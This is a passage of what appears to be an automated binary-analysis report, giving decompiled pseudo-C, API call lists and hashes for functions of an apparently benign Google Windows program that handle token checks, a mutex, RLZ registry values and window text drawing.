                                                                                                                                                                    										if( *(GetSidSubAuthority( *_t62, _t56 & 0x000000ff)) >= 0x2000) {
                                                                                                                                                                    											asm("sbb edx, edx");
                                                                                                                                                                    											 *0x55ffa0 = _t56 + 3;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											 *0x55ffa0 = 1;
                                                                                                                                                                    										}
                                                                                                                                                                    										__imp__CoTaskMemFree(_t62);
                                                                                                                                                                    										_t31 = _v24;
                                                                                                                                                                    										if(_t31 != 0) {
                                                                                                                                                                    											CloseHandle(_t31);
                                                                                                                                                                    										}
                                                                                                                                                                    										return 0;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t34 = GetLastError();
                                                                                                                                                                    										if(_t34 > 0) {
                                                                                                                                                                    											_t34 = _t34 & 0x0000ffff | 0x80070000;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t60 = _t34;
                                                                                                                                                                    										__imp__CoTaskMemFree(_t62);
                                                                                                                                                                    										_t35 = _v24;
                                                                                                                                                                    										if(_t35 != 0) {
                                                                                                                                                                    											CloseHandle(_t35);
                                                                                                                                                                    										}
                                                                                                                                                                    										return _t60;
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									goto L15;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t39 = GetLastError();
                                                                                                                                                                    							goto L4;
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t39 = GetLastError();
                                                                                                                                                                    						L4:
                                                                                                                                                                    						if(_t39 > 0) {
                                                                                                                                                                    							_t39 = _t39 & 0x0000ffff | 0x80070000;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t63 = _t39;
                                                                                                                                                                    						_t40 = _v12;
                                                                                                                                                                    						if(_t40 != 0) {
                                                                                                                                                                    							CloseHandle(_t40);
                                                                                                                                                                    						}
                                                                                                                                                                    						return _t63;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					return 0x80004005;
                                                                                                                                                                    				}
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004C76D0: _memset.LIBCMT ref: 004C76F9
                                                                                                                                                                      • Part of subcall function 004C76D0: VerSetConditionMask.KERNEL32 ref: 004C7719
                                                                                                                                                                      • Part of subcall function 004C76D0: VerifyVersionInfoW.KERNEL32(00000000,00000002,00000000), ref: 004C7728
                                                                                                                                                                    • OpenProcessToken.ADVAPI32 ref: 004C7439
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004C7443
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004C7462
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseConditionErrorHandleInfoLastMaskOpenProcessTokenVerifyVersion_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3114600267-0
                                                                                                                                                                    • Opcode ID: 6eebfb4e3a3d6009bb2ff1e7b8ababfc7de579141a663193ccd5780158b2a10d
                                                                                                                                                                    • Instruction ID: 95c0111a7d7f7b4f9f6eb780a149b86f90f49d49f15a67e38097c5e8f375ed40
                                                                                                                                                                    • Opcode Fuzzy Hash: 6eebfb4e3a3d6009bb2ff1e7b8ababfc7de579141a663193ccd5780158b2a10d
                                                                                                                                                                    • Instruction Fuzzy Hash: 4041AC796086029BD720DF24EC48F6B7BE8EFA5761F14492AF940C3650D738D80D9B6A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                    			E004C5030(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                    				void* _t73;
                                                                                                                                                                    				char _t75;
                                                                                                                                                                    				void* _t78;
                                                                                                                                                                    				void* _t82;
                                                                                                                                                                    				void* _t90;
                                                                                                                                                                    				void* _t94;
                                                                                                                                                                    				signed int** _t97;
                                                                                                                                                                    				void*** _t99;
                                                                                                                                                                    				void* _t100;
                                                                                                                                                                    				void* _t111;
                                                                                                                                                                    				void* _t114;
                                                                                                                                                                    				WCHAR* _t118;
                                                                                                                                                                    				void* _t121;
                                                                                                                                                                    				void* _t125;
                                                                                                                                                                    				void* _t126;
                                                                                                                                                                    				void* _t141;
                                                                                                                                                                    				signed int _t146;
				void* _t151;
				void* _t152;
				void* _t155;
				void* _t158;
				void* _t159;
				void* _t163;
				void* _t164;
				signed int _t169;
				void* _t170;
				signed int _t171;
				signed int _t172;
				void* _t174;

				_t174 = __eflags;
				_t143 = __edx;
				_push(0xffffffff);
				_push(0x517412);
				_push( *[fs:0x0]);
				_t171 = _t170 - 0x1bc;
				_t66 =  *0x5596fc; // 0x9d48295
				 *(_t171 + 0x1b8) = _t66 ^ _t171;
				_t68 =  *0x5596fc; // 0x9d48295
				_push(_t68 ^ _t171);
				 *[fs:0x0] = _t171 + 0x1d0;
				_t151 = __ecx;
				_t125 = __edx;
				 *((intOrPtr*)(_t171 + 0x44)) = __ecx;
				 *__edx = 0;
				 *((char*)(_t171 + 0x3c)) = 0;
				_t158 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
				_push(_t158);
				 *(_t171 + 0x38) = _t158;
				_t73 = L004C5D10(_t143, _t174);
				_t172 = _t171 + 4;
				if(_t73 != 0) {
					 *(_t172 + 0x30) = WaitForSingleObject(_t158, 0x1388) == 0;
				}
				 *((intOrPtr*)(_t172 + 0x1d8)) = 0;
				if( *(_t172 + 0x30) == 0) {
					L8:
					CloseHandle(_t158);
					_t75 = 0;
					goto L32;
				} else {
					 *(_t172 + 0x20) = 0x80000001;
					 *((char*)(_t172 + 0x1d8)) = 1;
					if(E004C75E0() == 0) {
						__eflags = _t151;
						if(_t151 == 0) {
							goto L4;
						}
						E004C8730(L"rep=2", _t172 + 0x28);
						 *((char*)(_t172 + 0x1d8)) = 2;
						_t143 =  *(_t172 + 0x28);
						_t153 = _t172 + 0x2c;
						 *(_t172 + 0x2c) = 0;
						_t82 = L004C7AA0(_t125,  *(_t172 + 0x28), _t172 + 0x2c);
						__eflags = _t82;
						if(_t82 == 0) {
							L35:
							L004C8A50(_t172 + 0x28, _t143);
							L004C7B10(_t172 + 0x20);
							L004C5DF0(_t172 + 0x30);
							_t75 = 0;
							L32:
							 *[fs:0x0] =  *((intOrPtr*)(_t172 + 0x1d0));
							_pop(_t152);
							_pop(_t159);
							_pop(_t126);
							return L004EEDC9(_t75, _t126,  *(_t172 + 0x1b8) ^ _t172, _t143, _t152, _t159);
						}
						L0040CC20(_t172 + 0x24);
						 *((char*)(_t172 + 0x1e0)) = 3;
						L004C7EF0(_t172 + 0x24, L"&%s=", L"rlz");
						_t143 =  *(_t172 + 0x2c);
						_t172 = _t172 + 8;
						_t90 = L004C7AA0(_t125, _t143, _t153);
						__eflags = _t90;
						if(_t90 == 0) {
							L34:
							L004C8A50(_t172 + 0x24, _t143);
							goto L35;
						}
						_t162 =  *(_t172 + 0x38);
						_t169 = 0;
						 *((char*)(_t172 + 0x1b)) = 1;
						__eflags =  *( *(_t172 + 0x38));
						if(__eflags == 0) {
							L20:
							 *((short*)(_t172 + 0xc4)) = 0;
							_t94 = L004C6D40(_t172 + 0xc4, _t143, __eflags);
							__eflags = _t94;
							if(_t94 == 0) {
								L24:
								 *((short*)(_t125 +  *(_t172 + 0x2c) * 2)) = 0;
								 *((char*)(_t172 + 0x1d8)) = 2;
								_t97 =  *((intOrPtr*)(_t172 + 0x24)) + 0xfffffff0;
								asm("lock xadd [ecx], edx");
								_t146 = 0xfffffffffffffffe;
								__eflags = 0xffffffff;
								if(0xffffffff <= 0) {
									_t146 =  *( *_t97);
									 *((intOrPtr*)( *((intOrPtr*)(_t146 + 4))))(_t97);
								}
								 *((char*)(_t172 + 0x1d8)) = 1;
								_t99 =  *(_t172 + 0x28) + 0xfffffff0;
								asm("lock xadd [ecx], edx");
								_t143 = (_t146 | 0xffffffff) - 1;
								__eflags = (_t146 | 0xffffffff) - 1;
								if((_t146 | 0xffffffff) - 1 <= 0) {
									_t143 =  *( *_t99);
									 *((intOrPtr*)( *((intOrPtr*)( *( *_t99) + 4))))(_t99);
								}
								_t100 =  *(_t172 + 0x20);
								__eflags = _t100;
								if(_t100 != 0) {
									__eflags = _t100 - 0x80000001;
									if(_t100 != 0x80000001) {
										RegCloseKey(_t100);
									}
								}
								_t163 =  *(_t172 + 0x34);
								ReleaseMutex(_t163);
								CloseHandle(_t163);
								_t75 = 1;
								goto L32;
							}
							__eflags =  *((short*)(_t172 + 0xc4));
							if( *((short*)(_t172 + 0xc4)) == 0) {
								goto L24;
							}
							_t164 = _t172 + 0x1c;
							L0040CC20(_t164);
							_push(_t172 + 0xc4);
							 *((char*)(_t172 + 0x1e4)) = 5;
							L004C7EF0(_t164, L"&%s=%s", L"dcc");
							_t143 =  *(_t172 + 0x28);
							_t172 = _t172 + 0xc;
							_t111 = L004C7AA0(_t125, _t143, _t172 + 0x2c);
							_t141 = _t164;
							__eflags = _t111;
							if(_t111 == 0) {
								L33:
								L004C8A50(_t141, _t143);
								goto L34;
							}
							L004C8A50(_t141, _t143);
							goto L24;
						} else {
							goto L13;
						}
						do {
							L13:
							_t114 = L004C4B10( *_t162, __eflags, _t172 + 0x3c);
							_t172 = _t172 + 4;
							__eflags = _t114;
							if(_t114 == 0) {
								goto L19;
							}
							_t155 = L004C5E10( *_t162);
							__eflags = _t155;
							if(_t155 == 0) {
								goto L19;
							}
							L0040CC20(_t172 + 0x1c);
							__eflags =  *((char*)(_t172 + 0x1b));
							 *((char*)(_t172 + 0x1d8)) = 4;
							_t118 = 0x52fc70;
							if( *((char*)(_t172 + 0x1b)) == 0) {
								_t118 = ",";
							}
							_push(_t172 + 0x3c);
							_push(":");
							_push(_t155);
							L004C7EF0(_t172 + 0x30, L"%s%s%s%s", _t118);
							_t143 =  *(_t172 + 0x30);
							_t172 = _t172 + 0x14;
							 *((char*)(_t172 + 0x1b)) = 0;
							_t121 = L004C7AA0(_t125, _t143, _t172 + 0x2c);
							_t141 = _t172 + 0x1c;
							__eflags = _t121;
							if(_t121 == 0) {
								goto L33;
							} else {
								 *((char*)(_t172 + 0x1d8)) = 3;
								L004C8A50(_t141, _t143);
							}
							L19:
							_t143 =  *(_t172 + 0x38);
                                                                                                                                                                    							_t169 = _t169 + 1;
                                                                                                                                                                    							__eflags =  *(_t143 + _t169 * 4);
                                                                                                                                                                    							_t162 = _t143 + _t169 * 4;
                                                                                                                                                                    						} while (__eflags != 0);
                                                                                                                                                                    						goto L20;
                                                                                                                                                                    					}
                                                                                                                                                                    					L4:
                                                                                                                                                                    					_t78 =  *(_t172 + 0x20);
                                                                                                                                                                    					if(_t78 != 0 && _t78 != 0x80000001) {
                                                                                                                                                                    						RegCloseKey(_t78);
                                                                                                                                                                    					}
                                                                                                                                                                    					ReleaseMutex(_t158);
                                                                                                                                                                    					goto L8;
                                                                                                                                                                    				}
                                                                                                                                                                    			}





































                                                                                                                                                                    0x004c51f5
                                                                                                                                                                    0x004c51f7
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c51fd
                                                                                                                                                                    0x004c51fd
                                                                                                                                                                    0x004c5205
                                                                                                                                                                    0x004c5205
                                                                                                                                                                    0x004c520a
                                                                                                                                                                    0x004c520a
                                                                                                                                                                    0x004c520e
                                                                                                                                                                    0x004c520f
                                                                                                                                                                    0x004c5213
                                                                                                                                                                    0x004c5213
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c5180
                                                                                                                                                                    0x004c50d8
                                                                                                                                                                    0x004c50d8
                                                                                                                                                                    0x004c50de
                                                                                                                                                                    0x004c50e8
                                                                                                                                                                    0x004c50e8
                                                                                                                                                                    0x004c50ef
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c50ef

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,00000000,00000002,?,00000000), ref: 004C5085
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004C50A4
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001), ref: 004C50E8
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 004C50EF
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004C50F6
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004C52F4
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 004C52FF
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004C5306
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Mutex$HandleRelease$CreateObjectSingleWait
                                                                                                                                                                    • String ID: %s%s%s%s$&%s=$&%s=%s$dcc$rep=2$rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
                                                                                                                                                                    • API String ID: 3553343216-2145161418
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                    			E004495F0(void* __ecx, void* __edx) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				struct tagRECT _v32;
                                                                                                                                                                    				struct tagRECT _v56;
                                                                                                                                                                    				int _v60;
                                                                                                                                                                    				struct HWND__* _v64;
                                                                                                                                                                    				int _v68;
                                                                                                                                                                    				int _v72;
                                                                                                                                                                    				int _v76;
                                                                                                                                                                    				int _v80;
                                                                                                                                                                    				void* _v84;
                                                                                                                                                                    				long _v88;
                                                                                                                                                                    				int _v92;
                                                                                                                                                                    				void* _v96;
                                                                                                                                                                    				WCHAR* _v100;
                                                                                                                                                                    				WCHAR* _v104;
                                                                                                                                                                    				void* _v112;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                    				struct HWND__* _t105;
                                                                                                                                                                    				void* _t114;
                                                                                                                                                                    				void* _t115;
                                                                                                                                                                    				signed char _t117;
                                                                                                                                                                    				int _t120;
                                                                                                                                                                    				WCHAR* _t135;
                                                                                                                                                                    				struct HDC__* _t148;
                                                                                                                                                                    				void* _t149;
                                                                                                                                                                    				void* _t150;
                                                                                                                                                                    				signed int _t157;
                                                                                                                                                                    				void* _t172;
                                                                                                                                                                    				struct tagRECT* _t187;
                                                                                                                                                                    				void* _t188;
                                                                                                                                                                    				void* _t189;
                                                                                                                                                                    				void* _t191;
                                                                                                                                                                    				void* _t192;
                                                                                                                                                                    				void* _t194;
                                                                                                                                                                    				signed int _t195;
                                                                                                                                                                    
                                                                                                                                                                    				_t172 = __edx;
                                                                                                                                                                    				_t197 = (_t195 & 0xfffffff8) - 0x54;
                                                                                                                                                                    				_t101 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_v8 = _t101 ^ (_t195 & 0xfffffff8) - 0x00000054;
                                                                                                                                                                    				_t191 = __ecx;
                                                                                                                                                                    				if(IsWindow( *(__ecx + 4)) != 0) {
                                                                                                                                                                    					if( *((intOrPtr*)(_t191 + 0x24)) != 0 ||  *((intOrPtr*)(_t191 + 0x28)) != 0) {
                                                                                                                                                                    						_t105 =  *(_t191 + 4);
                                                                                                                                                                    						_v64 = _t105;
                                                                                                                                                                    						_t148 = GetDC(_t105);
                                                                                                                                                                    						_v56.left = 0;
                                                                                                                                                                    						_v56.top = 0;
                                                                                                                                                                    						_v56.right = 0;
                                                                                                                                                                    						_v56.bottom = 0;
                                                                                                                                                                    						GetClientRect( *(_t191 + 4),  &_v56);
                                                                                                                                                                    						_t174 = _v56.right;
                                                                                                                                                                    						_t187 = _t191 + 0x38;
                                                                                                                                                                    						_t187->left = _v56.left;
                                                                                                                                                                    						_t187->top = _v56.top;
                                                                                                                                                                    						_t187->right = _v56.right;
                                                                                                                                                                    						_t187->bottom = _v56.bottom;
                                                                                                                                                                    						if(( *(_t191 + 0x58) & 0x00000001) != 0) {
                                                                                                                                                                    							if(( *(_t191 + 0x54) >> 0x00000004 & 0x00000001) == 0) {
                                                                                                                                                                    								_t114 =  *(_t191 + 0x30);
                                                                                                                                                                    								_v76 = 0;
                                                                                                                                                                    								if(_t114 != 0) {
                                                                                                                                                                    									_v84 = SelectObject(_t148, _t114);
                                                                                                                                                                    								}
                                                                                                                                                                    								_t115 =  *((intOrPtr*)(_t191 + 0x24));
                                                                                                                                                                    								if(_t115 == 0) {
                                                                                                                                                                    									_v84 =  *((intOrPtr*)(_t191 + 0x28));
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_v84 = _t115;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t117 = GetWindowLongW( *(_t191 + 4), 0xfffffff0);
                                                                                                                                                                    								_t157 = 0;
                                                                                                                                                                    								_t174 = _t117 & 0x00000001;
                                                                                                                                                                    								_v68 = _t117;
                                                                                                                                                                    								_v80 = _t174;
                                                                                                                                                                    								if(_t174 == 0) {
                                                                                                                                                                    									if((_t117 & 0x00000002) != 0) {
                                                                                                                                                                    										_t157 = 2;
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t157 = 1;
                                                                                                                                                                    								}
                                                                                                                                                                    								DrawTextW(_t148, _v84, 0xffffffff, _t187, _t157 | 0x00000410);
                                                                                                                                                                    								if( *(_t191 + 0x30) != 0) {
                                                                                                                                                                    									_t174 = _v76;
                                                                                                                                                                    									SelectObject(_t148, _t174);
                                                                                                                                                                    								}
                                                                                                                                                                    								if(_v80 == 0) {
                                                                                                                                                                    									if((_v68 & 0x00000002) != 0) {
                                                                                                                                                                    										_t120 = _v56.right -  *((intOrPtr*)(_t191 + 0x40));
                                                                                                                                                                    										goto L26;
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									asm("cdq");
                                                                                                                                                                    									_t120 = _v56.right -  *((intOrPtr*)(_t191 + 0x40)) - _t174 >> 1;
                                                                                                                                                                    									L26:
                                                                                                                                                                    									OffsetRect(_t187, _t120, 0);
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_v72 = 0;
                                                                                                                                                                    								_v60 = 0;
                                                                                                                                                                    								_v84 = 0;
                                                                                                                                                                    								_v76 = 0;
                                                                                                                                                                    								_v80 = 0;
                                                                                                                                                                    								_v68 = 0;
                                                                                                                                                                    								L00449A60(_t191,  &_v72,  &_v60,  &_v84,  &_v76,  &_v80,  &_v68);
                                                                                                                                                                    								_v112 = SelectObject(_t148,  *(_t191 + 0x34));
                                                                                                                                                                    								_v56.left = _v88;
                                                                                                                                                                    								_v56.bottom = _v76;
                                                                                                                                                                    								_t135 = _v104;
                                                                                                                                                                    								_v56.top = _v84;
                                                                                                                                                                    								_v56.right = _v80;
                                                                                                                                                                    								if(_t135 != 0) {
                                                                                                                                                                    									DrawTextW(_t148, _t135, _v68,  &_v32, 0x410);
                                                                                                                                                                    								}
                                                                                                                                                                    								SelectObject(_t148,  *(_t191 + 0x30));
                                                                                                                                                                    								_v56.left = _v72;
                                                                                                                                                                    								_v56.top = _v68;
                                                                                                                                                                    								_v56.right = _v64;
                                                                                                                                                                    								_v56.bottom = _v60;
                                                                                                                                                                    								if(_v88 != 0) {
                                                                                                                                                                    									_v56.left = _v32.left;
                                                                                                                                                                    								}
                                                                                                                                                                    								DrawTextW(_t148, _v100, _v92,  &_v56, 0x410);
                                                                                                                                                                    								SelectObject(_t148, _v96);
                                                                                                                                                                    								_t174 = _v60;
                                                                                                                                                                    								_t187->left = _v64;
                                                                                                                                                                    								_t187->top = _v60;
                                                                                                                                                                    								_t187->right = _v56.left;
                                                                                                                                                                    								_t187->bottom = _v56.top;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						ReleaseDC(_v64, _t148);
                                                                                                                                                                    						_pop(_t188);
                                                                                                                                                                    						_pop(_t192);
                                                                                                                                                                    						_pop(_t149);
                                                                                                                                                                    						return L004EEDC9(1, _t149, _v8 ^ _t197, _t174, _t188, _t192);
                                                                                                                                                                    					} else {
                                                                                                                                                                    						goto L1;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					L1:
                                                                                                                                                                    					_pop(_t189);
                                                                                                                                                                    					_pop(_t194);
                                                                                                                                                                    					_pop(_t150);
                                                                                                                                                                    					return L004EEDC9(0, _t150, _v8 ^ _t197, _t172, _t189, _t194);
                                                                                                                                                                    				}
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • IsWindow.USER32(?), ref: 0044960D
                                                                                                                                                                    • GetDC.USER32(?), ref: 0044963F
                                                                                                                                                                    • GetClientRect.USER32 ref: 00449666
                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 004496E7
                                                                                                                                                                    • DrawTextW.USER32(00000000,?,?,?,00000410), ref: 0044972A
                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0044973B
                                                                                                                                                                    Strings
                                                                                                                                                                    • https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN, xrefs: 00449605
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ObjectSelect$ClientDrawRectTextWindow
                                                                                                                                                                    • String ID: https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN
                                                                                                                                                                    • API String ID: 452443381-950128553
                                                                                                                                                                    • Opcode ID: 301c6677afbca942ad6eccd49aeb1ea71d7c0363537a55380391e826bafa7b82
                                                                                                                                                                    • Instruction ID: 37907fb914c6d49d162fc2ca2766324b955e0c23146b83ade821670ec174c477
                                                                                                                                                                    • Opcode Fuzzy Hash: 301c6677afbca942ad6eccd49aeb1ea71d7c0363537a55380391e826bafa7b82
                                                                                                                                                                    • Instruction Fuzzy Hash: 3A8102B5618741AFD314CF69C884A6BBBE8FF99704F004A2EF98A83350D774E845CB56
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                    			E004C65A0(void* __ecx, int __edx, void* __eflags) {
                                                                                                                                                                    				char _v4;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				int _v16;
                                                                                                                                                                    				int _v20;
                                                                                                                                                                    				int _v24;
                                                                                                                                                                    				void* _v28;
                                                                                                                                                                    				char _v32;
                                                                                                                                                                    				WCHAR* _v36;
                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                    				void* _t32;
                                                                                                                                                                    				WCHAR* _t39;
                                                                                                                                                                    				int _t43;
                                                                                                                                                                    				void* _t44;
                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                    				void* _t51;
                                                                                                                                                                    				signed int _t56;
                                                                                                                                                                    				void* _t70;
                                                                                                                                                                    				char* _t72;
                                                                                                                                                                    				void* _t75;
                                                                                                                                                                    				void* _t77;
                                                                                                                                                                    				void* _t78;
                                                                                                                                                                    				void* _t79;
                                                                                                                                                                    				void* _t85;
                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                    				void* _t87;
                                                                                                                                                                    				void* _t90;
                                                                                                                                                                    
                                                                                                                                                                    				_t90 = __eflags;
                                                                                                                                                                    				_t68 = __edx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(0x513b90);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				_t86 = _t85 - 0x1c;
                                                                                                                                                                    				_t28 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_push(_t28 ^ _t86);
                                                                                                                                                                    				 *[fs:0x0] =  &_v12;
                                                                                                                                                                    				_t75 = __ecx;
                                                                                                                                                                    				_t56 = 0;
                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                    				_t70 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
                                                                                                                                                                    				_push(_t70);
                                                                                                                                                                    				_v28 = _t70;
                                                                                                                                                                    				_t32 = L004C5D10(_t68, _t90);
                                                                                                                                                                    				_t87 = _t86 + 4;
                                                                                                                                                                    				if(_t32 != 0) {
                                                                                                                                                                    					_t56 = 0 | WaitForSingleObject(_t70, 0x1388) == 0x00000000;
                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                    					L7:
                                                                                                                                                                    					_push(_t70);
                                                                                                                                                                    					goto L8;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_v24 = 0;
                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                    					_v4 = 1;
                                                                                                                                                                    					if(E00401690(L"Software\\Google\\Common\\Rlz",  &_v24, 0x2021f) == 0) {
                                                                                                                                                                    						__eflags = _t75;
                                                                                                                                                                    						if(_t75 == 0) {
                                                                                                                                                                    							L14:
                                                                                                                                                                    							_push(_t75);
                                                                                                                                                                    							_push( &_v36);
                                                                                                                                                                    							E004C6390();
                                                                                                                                                                    							_t39 = _v36;
                                                                                                                                                                    							_t77 = _v24;
                                                                                                                                                                    							_t87 = _t87 + 8;
                                                                                                                                                                    							_t72 = _t39;
                                                                                                                                                                    							__eflags = _t39;
                                                                                                                                                                    							if(_t39 == 0) {
                                                                                                                                                                    								L16:
                                                                                                                                                                    								L004C8A50( &_v36, _t68);
                                                                                                                                                                    								__eflags = _t77;
                                                                                                                                                                    								if(_t77 != 0) {
                                                                                                                                                                    									RegCloseKey(_t77);
                                                                                                                                                                    								}
                                                                                                                                                                    								_t78 = _v28;
                                                                                                                                                                    								ReleaseMutex(_t78);
                                                                                                                                                                    								_push(_t78);
                                                                                                                                                                    								L8:
                                                                                                                                                                    								CloseHandle();
                                                                                                                                                                    								 *[fs:0x0] = _v12;
                                                                                                                                                                    								return 0;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t43 = lstrlenW(_t39);
                                                                                                                                                                    								_t21 = _t43 + 2; // 0x2
                                                                                                                                                                    								_t68 = _t43 + _t21;
                                                                                                                                                                    								_t44 = RegSetValueExW(_t77, L"DCC", 0, 1, _t72, _t43 + _t21);
                                                                                                                                                                    								__eflags = _t44;
                                                                                                                                                                    								if(_t44 == 0) {
                                                                                                                                                                    									L004C8A50( &_v36, _t68);
                                                                                                                                                                    									__eflags = _t77;
                                                                                                                                                                    									if(_t77 != 0) {
                                                                                                                                                                    										RegCloseKey(_t77);
                                                                                                                                                                    									}
                                                                                                                                                                    									_t79 = _v28;
                                                                                                                                                                    									ReleaseMutex(_t79);
                                                                                                                                                                    									CloseHandle(_t79);
                                                                                                                                                                    									 *[fs:0x0] = _v12;
                                                                                                                                                                    									return 1;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									goto L16;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t50 = 0;
                                                                                                                                                                    							__eflags =  *_t75;
                                                                                                                                                                    							if( *_t75 == 0) {
                                                                                                                                                                    								goto L14;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								while(1) {
                                                                                                                                                                    									__eflags = _t50 - 0x80;
                                                                                                                                                                    									if(_t50 >= 0x80) {
                                                                                                                                                                    										goto L4;
                                                                                                                                                                    									}
                                                                                                                                                                    									_t50 = _t50 + 1;
                                                                                                                                                                    									__eflags =  *(_t75 + _t50 * 2);
                                                                                                                                                                    									if( *(_t75 + _t50 * 2) != 0) {
                                                                                                                                                                    										continue;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										goto L14;
                                                                                                                                                                    									}
                                                                                                                                                                    									goto L22;
                                                                                                                                                                    								}
